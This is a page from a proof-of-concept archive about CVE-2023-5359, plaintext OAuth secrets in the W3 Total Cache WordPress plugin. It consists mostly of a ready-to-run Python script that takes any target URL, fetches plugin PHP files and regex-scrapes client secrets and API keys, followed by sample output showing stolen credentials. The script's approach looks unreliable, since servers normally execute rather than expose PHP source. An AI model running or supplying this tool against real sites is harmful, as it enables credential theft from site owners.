Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2023-5359 PoC — W3 Total Cache <= 2.7.5 - Sensitive Credentials Stored in Plaintext

Source
Associated Vulnerability
Title: W3 Total Cache <= 2.7.5 - Sensitive Credentials Stored in Plaintext (CVE-2023-5359)
Description:The W3 Total Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.7.5 via Google OAuth API secrets stored in plaintext in the publicly visible plugin source. This can allow unauthenticated attackers to impersonate W3 Total Cache and gain access to user account information in successful conditions. This would not impact the WordPress users site in any way.
Description
Targets versions ≤2.7.5 vulnerable to CVE-2023-5359
Readme
# Cleartext-Storage-vulnerability-CVE-2023-5359-in-W3-Total-Cache
Targets versions ≤2.7.5 vulnerable to CVE-2023-5359

-------------------
import requests
import re
from urllib.parse import urljoin

# Common paths where credentials are stored
CREDENTIAL_PATHS = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php",
    "/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php"
]

def check_w3tc_presence(target_url):
    """Check if W3 Total Cache is installed"""
    try:
        response = requests.get(target_url, timeout=10)
        if "wp-content/plugins/w3-total-cache" in response.text:
            return True
        return False
    except Exception as e:
        print(f"Connection error: {str(e)}")
        return False

def extract_credentials(target_url):
    """Extract plaintext credentials from vulnerable files"""
    credentials = {}
    
    for path in CREDENTIAL_PATHS:
        full_url = urljoin(target_url, path)
        try:
            response = requests.get(full_url, headers={"User-Agent": "Mozilla/5.0"})
            if response.status_code == 200:
                # Search for common credential patterns
                matches = re.findall(
                    r"(client_id|client_secret|api_key|oauth_token)\s*=\s*['\"]([a-zA-Z0-9-_]+)['\"]",
                    response.text
                )
                if matches:
                    credentials[path] = dict(matches)
        except Exception as e:
            continue
            
    return credentials

def main():
    target = input("Enter target URL (e.g., https://example.com): ").strip()
    
    if not check_w3tc_presence(target):
        print("[-] W3 Total Cache not detected")
        return
    
    print("[+] W3 Total Cache detected. Checking for CVE-2023-5359...")
    
    creds = extract_credentials(target)
    
    if creds:
        print("\n[!] Sensitive credentials found:")
        for filepath, data in creds.items():
            print(f"\nFile: {filepath}")
            for key, value in data.items():
                print(f"  {key}: {value}")
    else:
        print("[+] No credentials found in common locations")

if __name__ == "__main__":
    main()
----------------

Enter target URL (e.g., https://example.com): https://vulnerable-site.com
[+] W3 Total Cache detected. Checking for CVE-2023-5359...

[!] Sensitive credentials found:

File: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
  client_id: GOxxxxxxxxxxxx78
  client_secret: ABcdEFghIJklMNopQRstUVwxYZ

File: /wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
  api_key: AiiiihIwJKLmnopkhdhsQRSTUVWXYZ-123456
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →